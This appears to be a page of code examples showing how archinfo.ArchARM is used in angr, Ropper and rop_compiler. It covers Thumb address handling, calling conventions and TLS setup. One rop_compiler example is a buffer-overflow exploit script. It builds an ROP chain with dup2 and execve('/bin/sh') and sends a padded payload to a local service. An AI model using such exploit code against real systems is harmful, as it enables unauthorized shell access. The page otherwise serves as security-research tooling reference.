How to use the archinfo.ArchARM function in archinfo

To help you get started, we’ve selected a few archinfo examples, based on popular ways it is used in public projects.

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github angr / angr / angr / simos / View on Github external
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
            if _rtld_global_ro is not None:

        libc_obj = self.project.loader.find_object('')
        if libc_obj:
            self._weak_hook_symbol('_dl_vdso_vsym', L[''].get('_dl_vdso_vsym', self.arch), libc_obj)

        tls_obj = self.project.loader.tls_object
        if tls_obj is not None:
            if isinstance(self.project.arch, ArchAMD64):
                self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x28, 0x5f43414e41525900)  # _CANARY\x00
                self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
            elif isinstance(self.project.arch, ArchX86):
                self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x10, self.vsyscall_addr)
            elif isinstance(self.project.arch, ArchARM):
                self.project.hook(0xffff0fe0, P['linux_kernel']['_kernel_user_helper_get_tls']())

        # Only set up ifunc resolution if we are using the ELF backend on AMD64
        if isinstance(self.project.loader.main_object, MetaELF):
            if isinstance(self.project.arch, (ArchAMD64, ArchX86)):
                for binary in self.project.loader.all_objects:
                    if not isinstance(binary, MetaELF):
                    for reloc in binary.relocs:
                        if reloc.symbol is None or reloc.resolvedby is None:
                            if reloc.resolvedby.subtype != ELFSymbolType.STT_GNU_IFUNC:
                        except ValueError:  # base class Symbol throws this, meaning we don't have an ELFSymbol, etc
github jeffball55 / rop_compiler / pyrop / rop_compiler / View on Github external
self._addr = 0x40000
      self.arch = arch

  # A simple set of tests to ensure we can correctly synthesize some example gadgets
  tests = {
    archinfo.ArchAMD64 : {
      (LoadMem, None, 16, ()) : GadgetList([
        MoveReg(archinfo.ArchAMD64(), FakeIrsb(archinfo.ArchAMD64), [40], 16, [], [], 8, 4),
        LoadMem(archinfo.ArchAMD64(), FakeIrsb(archinfo.ArchAMD64), [48], 40, [], [], 8, 4)
    archinfo.ArchMIPS64 : {
    archinfo.ArchPPC64 : {
    archinfo.ArchARM : {
  #import sys
  #arch = archinfo.ArchAMD64
  #tests = { arch : tests[arch] }

  fail = False
  for arch, arch_tests in tests.items():
    print "\n{} Tests:".format(

    for ((desired_type, inputs, output, no_clobber), gadget_list) in arch_tests.items():
      synthesizer = GadgetSynthesizer(arch, gadget_list, logging.DEBUG)
      result_gadget = synthesizer.create_new_gadgets(desired_type, inputs, output, no_clobber)
      if result_gadget == None: # If we didn't get the gadget we want
        fail = True
        print "\nCouldn't create the gadget {}".format(desired_type.__name__)
github angr / angr / angr / engines / tcg / View on Github external
num_inst = 1
        if opt_level is None:
            if state and o.OPTIMIZE_IR in state.options:
                opt_level = 1
                opt_level = self._default_opt_level
        if self._support_selfmodifying_code:
            if opt_level > 0:
                l.warning("Self-modifying code is not always correctly optimized by PyVEX. To guarantee correctness, VEX optimizations have been disabled.")
                opt_level = 0
                if state and o.OPTIMIZE_IR in state.options:

        # phase 2: thumb normalization
        thumb = int(thumb)
        if isinstance(arch, ArchARM):
            if addr % 2 == 1:
                thumb = 1
            if thumb:
                addr &= ~1
        elif thumb:
            l.error("thumb=True passed on non-arm architecture!")
            thumb = 0

        # phase 3: check cache
        cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
        if self._use_cache and cache_key in self._block_cache:
            self._block_cache_hits += 1
            irsb = self._block_cache[cache_key]
            stop_point = self._first_stoppoint(irsb)
            if stop_point is None:
                return irsb
github sashs / Ropper / ropper / View on Github external
def __init__(self):
        super(ArchitectureArmThumb, self).__init__(CS_ARCH_ARM, CS_MODE_THUMB, 4, 2)
        self._searcher = SearcherARM()
        self._name = 'ARMTHUMB'
        self._maxInvalid = 2

        if 'archinfo' in globals():
            self._info = archinfo.ArchARM()

        if 'keystone' in globals():
            self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB)
github angr / angr / angr / View on Github external
class SimCCARM(SimCC):
    ARG_REGS = [ 'r0', 'r1', 'r2', 'r3' ]
    FP_ARG_REGS = []    # TODO: ???
    CALLER_SAVED_REGS = []   # TODO: ???
    RETURN_ADDR = SimRegArg('lr', 4)
    RETURN_VAL = SimRegArg('r0', 4)
    ARCH = archinfo.ArchARM

class SimCCARMLinuxSyscall(SimCC):
    # TODO: Make sure all the information is correct
    ARG_REGS = [ 'r0', 'r1', 'r2', 'r3' ]
    FP_ARG_REGS = []    # TODO: ???
    RETURN_ADDR = SimRegArg('ip_at_syscall', 4)
    RETURN_VAL = SimRegArg('r0', 4)
    ARCH = archinfo.ArchARM

    def _match(cls, arch, args, sp_delta):  # pylint: disable=unused-argument
        # never appears anywhere except syscalls
        return False

    def syscall_num(state):
        return state.regs.r7

class SimCCAArch64(SimCC):
    ARG_REGS = [ 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7' ]
    FP_ARG_REGS = []    # TODO: ???
    RETURN_ADDR = SimRegArg('lr', 8)
    RETURN_VAL = SimRegArg('x0', 8)
    ARCH = archinfo.ArchAArch64
github angr / angr / angr / View on Github external
if isinstance(self.proj.arch, ArchAMD64):
                    self.proj.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF08, self._loader_lock_addr)
                    self.proj.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF10, self._loader_unlock_addr)

            _rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
            if _rtld_global_ro is not None:

        tls_obj = self.proj.loader.tls_object
        if tls_obj is not None:
            if isinstance(self.proj.arch, ArchAMD64):
                self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x28, 0x5f43414e4152595f)
                self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
            elif isinstance(self.proj.arch, ArchX86):
                self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x10, self._vsyscall_addr)
            elif isinstance(self.proj.arch, ArchARM):
                self.proj.hook(0xffff0fe0, _kernel_user_helper_get_tls, kwargs={'ld': self.proj.loader})

        # Only set up ifunc resolution if we are using the ELF backend on AMD64
        if isinstance(self.proj.loader.main_bin, MetaELF):
            if isinstance(self.proj.arch, ArchAMD64):
                for binary in self.proj.loader.all_objects:
                    if not isinstance(binary, MetaELF):
                    for reloc in binary.relocs:
                        if reloc.symbol is None or reloc.resolvedby is None:
                        if reloc.resolvedby.type != 'STT_GNU_IFUNC':
                        gotaddr = reloc.addr + binary.rebase_addr
                        gotvalue = self.proj.loader.memory.read_addr_at(gotaddr)
github angr / angr / angr / engines / vex / View on Github external
l.warning("Self-modifying code is not always correctly optimized by PyVEX. "
                              "To guarantee correctness, VEX optimizations have been disabled.")
                opt_level = 0
                if state and o.OPTIMIZE_IR in state.options:
        if skip_stmts is not True:
            skip_stmts = False

        use_cache = self._use_cache
        if skip_stmts or collect_data_refs:
            # Do not cache the blocks if skip_stmts or collect_data_refs are enabled
            use_cache = False

        # phase 2: thumb normalization
        thumb = int(thumb)
        if isinstance(arch, ArchARM):
            if addr % 2 == 1:
                thumb = 1
            if thumb:
                addr &= ~1
        elif thumb:
            l.error("thumb=True passed on non-arm architecture!")
            thumb = 0

        # phase 3: check cache
        cache_key = None
        if use_cache:
            cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level, strict_block_end)
            if cache_key in self._block_cache:
                self._block_cache_hits += 1
                irsb = self._block_cache[cache_key]
                stop_point = self._first_stoppoint(irsb, extra_stop_points)
github angr / angr / angr / analyses / View on Github external
if not terminator_for_nonexistent_node:
                return None
            # Generate a PathTerminator node
            addr = block_id.addr
            func_addr = block_id.func_addr
            if func_addr is None:
                # We'll have to use the current block address instead
                # TODO: Is it really OK?
                func_addr = addr

            input_state = self.project.factory.entry_state()
            input_state.ip = addr
            pt = VFGNode(addr, block_id, input_state)
            self._nodes[block_id] = pt

            if isinstance(self.project.arch, archinfo.ArchARM) and addr % 2 == 1:
                self._thumb_addrs.add(addr - 1)

            l.debug("Block ID %s does not exist. Create a PathTerminator instead.",

        return self._nodes[block_id]
github jeffball55 / rop_compiler / pyrop / example / View on Github external
import archinfo
from pwn import *
from rop_compiler import ropme

filename = './arm_bof_execve'
p = remote('localhost', 2222)

print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [
  ["function", "dup2", 4, 0],
  ["function", "dup2", 4, 1],
  ["function", "dup2", 4, 2],
  ["execve", "/bin/sh"]
rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level = logging.DEBUG)

payload = 'A'*512 + 'B'*4 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input

with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)

github angr / angr / angr / View on Github external
def __init__(self, addr, project=None, arch=None, size=None, byte_string=None, vex=None, thumb=False, backup_state=None,
                 extra_stop_points=None, opt_level=None, num_inst=None, traceflags=0, strict_block_end=None, collect_data_refs=False):

        # set up arch
        if project is not None:
            self.arch = project.arch
            self.arch = arch

        if self.arch is None:
            raise ValueError('Either "project" or "arch" has to be specified.')

        if isinstance(self.arch, ArchARM):
            if addr & 1 == 1:
                thumb = True
            elif thumb:
                addr |= 1
            thumb = False

        self._project = project
        self.thumb = thumb
        self.addr = addr
        self._opt_level = opt_level

        if self._project is None and byte_string is None:
            raise ValueError('"byte_string" has to be specified if "project" is not provided.')

        if size is None: